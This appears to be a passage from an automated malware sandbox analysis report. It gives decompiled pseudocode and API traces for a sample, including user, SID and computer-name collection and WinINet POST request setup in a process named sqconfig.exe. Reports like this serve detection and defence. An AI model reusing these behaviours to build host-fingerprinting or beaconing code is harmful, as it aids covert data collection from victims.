                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc
                                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                    • API String ID: 1883125708-2866557904
                                                                    • Opcode ID: 362b9cabf5ac7dba346b645e3f3f1642086c31dc1fbbcb2e577ef78e05f1780f
                                                                    • Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
                                                                    • Opcode Fuzzy Hash: 362b9cabf5ac7dba346b645e3f3f1642086c31dc1fbbcb2e577ef78e05f1780f
                                                                    • Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C7488, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 75%
                                                                    			E005C7488(void* __eax, void* __esi, void* __ebp, void* __eflags) {
				char _v536;
				void* __ebx;
				intOrPtr* _t6;
				void* _t9;
				void* _t15;

				_t9 = __eax;
				E0040A1C8(__eax);
				_t6 = E00414020(_t9, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetSystemWow64DirectoryW");
				if(_t6 != 0) {
					_t6 =  *_t6( &_v536, 0x105);
					if(_t6 > 0 && _t6 < 0x105) {
						return E0040B318(_t9, 0x105, _t15);
					}
				}
				return _t6;
			}








                                                                    0x005c748f
                                                                    0x005c7493
                                                                    0x005c74a8
                                                                    0x005c74af
                                                                    0x005c74bb
                                                                    0x005c74bf
                                                                    0x00000000
                                                                    0x005c74d1
                                                                    0x005c74bf
                                                                    0x005c74dd

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                    • API String ID: 1646373207-1816364905
                                                                    • Opcode ID: de46d4672a17b173ff2fef0e233ef539359877c205945a502f5ea110ad9e1670
                                                                    • Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
                                                                    • Opcode Fuzzy Hash: de46d4672a17b173ff2fef0e233ef539359877c205945a502f5ea110ad9e1670
                                                                    • Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C8644, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 45%
                                                                    			E005C8644(void* __eax, void* __ecx) {
				void* __ebx;
				void* _t1;
				void* _t4;
				void* _t8;
				intOrPtr* _t9;

				_t1 = __eax;
				_t4 = __eax;
				if( *0x6d57e8 == 0) {
					 *0x6d57ec = E00414020(_t4, _t8, GetModuleHandleW(L"user32.dll"), L"ChangeWindowMessageFilter");
					 *_t9 = 0x6d57e8;
					_t1 = 1;
					asm("lock xchg [edx], eax");
				}
				if( *0x6d57ec != 0) {
					_t1 =  *0x6d57ec(_t4, 1);
				}
				return _t1;
			}








                                                                    0x005c8644
                                                                    0x005c8646
                                                                    0x005c864f
                                                                    0x005c8666
                                                                    0x005c866b
                                                                    0x005c8675
                                                                    0x005c867a
                                                                    0x005c867a
                                                                    0x005c8684
                                                                    0x005c8689
                                                                    0x005c8689
                                                                    0x005c8691

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                    • API String ID: 1646373207-2498399450
                                                                    • Opcode ID: fef6738620f745ab1874efba3004544ff6482e169155c0e349f99ac77237f17e
                                                                    • Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
                                                                    • Opcode Fuzzy Hash: fef6738620f745ab1874efba3004544ff6482e169155c0e349f99ac77237f17e
                                                                    • Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C8820, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 44%
                                                                    			E005C8820(void* __eax, void* __eflags) {
				void* __ebx;
				void* __esi;
				void* _t7;
				intOrPtr* _t8;
				void* _t9;

				_t9 = __eax;
				_t8 = E00414020(_t7, _t9, GetModuleHandleW(L"user32.dll"), L"ShutdownBlockReasonDestroy");
				if(_t8 == 0) {
					L2:
					return 0;
				} else {
					_push(_t9);
					if( *_t8() != 0) {
						return 1;
					} else {
						goto L2;
					}
				}
			}








                                                                    0x005c8822
                                                                    0x005c8839
                                                                    0x005c883d
                                                                    0x005c8846
                                                                    0x005c884a
                                                                    0x005c883f
                                                                    0x005c883f
                                                                    0x005c8844
                                                                    0x005c884f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c8844

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                    • API String ID: 1646373207-260599015
                                                                    • Opcode ID: 3fbd28814d97db1a372840751324d8c3ac9be682008ec3644daf7441840e1d78
                                                                    • Instruction ID: f0c74795214b74e90bc607b5066537e4d8d40fa8e1211c6ca3dcb32fdea7855f
                                                                    • Opcode Fuzzy Hash: 3fbd28814d97db1a372840751324d8c3ac9be682008ec3644daf7441840e1d78
                                                                    • Instruction Fuzzy Hash: 22D0C7B37117222A651075FA3CE1FF70A8CDD95795354087EF700E2941DD55DC4111A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B9800, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E006B9800(void* __eflags) {
				intOrPtr* _t2;
				void* _t4;
				void* _t5;

				_t2 = E00414020(_t4, _t5, GetModuleHandleW(L"user32.dll"), L"DisableProcessWindowsGhosting");
				if(_t2 != 0) {
					return  *_t2();
				}
				return _t2;
			}






                                                                    0x006b9810
                                                                    0x006b9817
                                                                    0x00000000
                                                                    0x006b9819
                                                                    0x006b981b

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                    • API String ID: 1646373207-834958232
                                                                    • Opcode ID: 1d0e836530d80ee037b6803170de1fe8933ba33f6b77be0c16a5e781bf2d5ad3
                                                                    • Instruction ID: a737f6cb342469133653c2ad22e7ce718afd724c013acdac2058dbbd1ad6bbf7
                                                                    • Opcode Fuzzy Hash: 1d0e836530d80ee037b6803170de1fe8933ba33f6b77be0c16a5e781bf2d5ad3
                                                                    • Instruction Fuzzy Hash: 99B092F0240331101C1072B33C02ACA080A08CBB497024C2A3720A108ADD4880C01239
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: sqconfig.exe PID: 5836 Parent PID: 6668 sqconfig.exeCOMMON

                                                                    Executed Functions

                                                                    Function 013C3BF0, Relevance: 57.6, APIs: 31, Strings: 1, Instructions: 1649COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: POST
                                                                    • API String ID: 0-1814004025
                                                                    • Opcode ID: debdf144cf84f559714aecce9f93d3428b4f3868956410a05452658ddae93703
                                                                    • Instruction ID: cc8b3941bcdf39c6d3311b03d9bee9ab8ceac281476a2da130ccfb270231252f
                                                                    • Opcode Fuzzy Hash: debdf144cf84f559714aecce9f93d3428b4f3868956410a05452658ddae93703
                                                                    • Instruction Fuzzy Hash: FBC23570E102099BEB14EFACD889BEEBBB6EF54718F10415CE801672C1D775AE85CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013C6950, Relevance: 33.6, APIs: 8, Strings: 11, Instructions: 325networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenW.WININET(013EBDDC,00000000,00000000,00000000,00000000), ref: 013C697C
                                                                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 013C699E
                                                                    • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 013C69E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InternetOpen$ConnectHttpRequest
                                                                    • String ID: 152138533219$:::$PW<$Pe<$Ps<$invalid stoi argument$stoi argument out of range$ N$![$ee$M
                                                                    • API String ID: 3864186401-2148631221
                                                                    • Opcode ID: 35c0c6717f9bfe7eeb45480725f86f0f6af29a3be884d09d697b74d66d659bf0
                                                                    • Instruction ID: dc17bf79cb84d408e2dc4f58a48c0cca204746aaecd2d1412116f964d0a360eb
                                                                    • Opcode Fuzzy Hash: 35c0c6717f9bfe7eeb45480725f86f0f6af29a3be884d09d697b74d66d659bf0
                                                                    • Instruction Fuzzy Hash: 53B1D2B0A102099BEF18EFA8CD89B9E7F76EB55708F50811CE9041B3C6D7759984CBD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013C1DA0, Relevance: 27.2, APIs: 18, Instructions: 157memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetUserNameW.ADVAPI32(00000000,013C4D86), ref: 013C1DCA
                                                                    • GetProcessHeap.KERNEL32(00000008,013C4D86), ref: 013C1DDF
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 013C1DE2
                                                                    • GetUserNameW.ADVAPI32(00000000,013C4D86), ref: 013C1DF0
                                                                    • LookupAccountNameW.ADVAPI32(00000000,?,00000000,013C4D86,00000000,?,?), ref: 013C1E13
                                                                    • GetProcessHeap.KERNEL32(00000008,013C4D86), ref: 013C1E1E
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 013C1E21
                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 013C1E31
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 013C1E34
                                                                    • LookupAccountNameW.ADVAPI32(00000000,?,00000000,013C4D86,00000000,?,?), ref: 013C1E5E
                                                                    • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 013C1E71
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 013C1F02
                                                                    • HeapFree.KERNEL32(00000000), ref: 013C1F0B
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013C1F10
                                                                    • HeapFree.KERNEL32(00000000), ref: 013C1F13
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013C1F1A
                                                                    • HeapFree.KERNEL32(00000000), ref: 013C1F1D
                                                                    • LocalFree.KERNEL32(00000000), ref: 013C1F22
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                    • String ID:
                                                                    • API String ID: 3326663573-0
                                                                    • Opcode ID: ed278a5d4159ae505332779dcc2e48c4c6dad07ee7de2e3054c171782e9406c3
                                                                    • Instruction ID: be939efae7c362b02ffb0a6d59f6d6df534e6184d44d4e1fd2bae5c647b216c9
                                                                    • Opcode Fuzzy Hash: ed278a5d4159ae505332779dcc2e48c4c6dad07ee7de2e3054c171782e9406c3
                                                                    • Instruction Fuzzy Hash: 03515FB5D00219ABEB20DFA9CC85BAFBFBCEF44744F044159E905E7241DA709E059BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013CBE40, Relevance: 13.6, APIs: 5, Strings: 2, Instructions: 1365libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 013C3BF0: GetVersionExW.KERNEL32(0000011C), ref: 013C4036
                                                                      • Part of subcall function 013C3BF0: GetVersionExW.KERNEL32(0000011C), ref: 013C42E6
                                                                      • Part of subcall function 013C1DA0: GetUserNameW.ADVAPI32(00000000,013C4D86), ref: 013C1DCA
                                                                      • Part of subcall function 013C1DA0: GetProcessHeap.KERNEL32(00000008,013C4D86), ref: 013C1DDF
                                                                      • Part of subcall function 013C1DA0: HeapAlloc.KERNEL32(00000000), ref: 013C1DE2
                                                                      • Part of subcall function 013C1DA0: GetUserNameW.ADVAPI32(00000000,013C4D86), ref: 013C1DF0
                                                                      • Part of subcall function 013C1DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,013C4D86,00000000,?,?), ref: 013C1E13
                                                                      • Part of subcall function 013C1DA0: GetProcessHeap.KERNEL32(00000008,013C4D86), ref: 013C1E1E
                                                                      • Part of subcall function 013C1DA0: HeapAlloc.KERNEL32(00000000), ref: 013C1E21
                                                                      • Part of subcall function 013C1DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 013C1E31
                                                                      • Part of subcall function 013C1DA0: HeapAlloc.KERNEL32(00000000), ref: 013C1E34
                                                                      • Part of subcall function 013C1DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,013C4D86,00000000,?,?), ref: 013C1E5E
                                                                      • Part of subcall function 013C1DA0: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 013C1E71
                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 013CBEAA
                                                                    • GetProcAddress.KERNEL32(00000000,000002A8), ref: 013CBF04
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 013CBF0F
                                                                    • GetUserNameW.ADVAPI32(?,00000100), ref: 013CBF82
                                                                    • GetComputerNameExW.KERNEL32(00000002,?,00000100,?,?,?), ref: 013CC062
                                                                      • Part of subcall function 013CDF30: Concurrency::cancel_current_task.LIBCPMT ref: 013CDFE4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.542573036.00000000013C1000.00000040.00020000.sdmp, Offset: 013C0000, based on PE: true
                                                                    • Associated: 00000013.00000002.542557474.00000000013C0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542654955.00000000013F2000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.542672420.00000000013FA000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544742991.00000000017BC000.00000040.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544760697.00000000017BE000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544823832.00000000017FC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544860931.000000000184A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544880918.000000000185A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.544901329.000000000186D000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545013443.0000000001932000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545066960.0000000001933000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545093920.0000000001934000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545113705.0000000001935000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545169551.0000000001939000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545221321.000000000193A000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545430756.0000000001947000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: HeapName$AllocProcessUser$AccountLibraryLookupVersion$AddressComputerConcurrency::cancel_current_taskConvertFreeLoadProcString
                                                                    • String ID: 152138533219$7b717a
                                                                    • API String ID: 1144133639-2095519259
                                                                    • Opcode ID: a2070931d6045ca83a760e79190c817a2f1d143dbf148ab922882de5bea00b8a
                                                                    • Instruction ID: d68c3216f1f6913b6871d9f704f1a3e4713223bb7bd0d11882351e7645e7ba7f
                                                                    • Opcode Fuzzy Hash: a2070931d6045ca83a760e79190c817a2f1d143dbf148ab922882de5bea00b8a
                                                                    • Instruction Fuzzy Hash: 43B24771A101154BEB2CDB2CCC8979DBA3BAB95718F1486ACE009A77D5DB359FC48F80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013CB490, Relevance: 14.4, APIs: 5, Strings: 2, Instructions: 2128libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 013C3BF0: GetVersionExW.KERNEL32(0000011C), ref: 013C4036
                                                                      • Part of subcall function 013C3BF0: GetVersionExW.KERNEL32(0000011C), ref: 013C42E6
                                                                      • Part of subcall function 013C1DA0: GetUserNameW.ADVAPI32(00000000,013C4D86), ref: 013C1DCA
                                                                      • Part of subcall function 013C1DA0: GetProcessHeap.KERNEL32(00000008,013C4D86), ref: 013C1DDF
                                                                      • Part of subcall function 013C1DA0: HeapAlloc.KERNEL32(00000000), ref: 013C1DE2
                                                                      • Part of subcall function 013C1DA0: GetUserNameW.ADVAPI32(00000000,013C4D86), ref: 013C1DF0
                                                                      • Part of subcall function 013C1DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,013C4D86,00000000,?,?), ref: 013C1E13
                                                                      • Part of subcall function 013C1DA0: GetProcessHeap.KERNEL32(00000008,013C4D86), ref: 013C1E1E
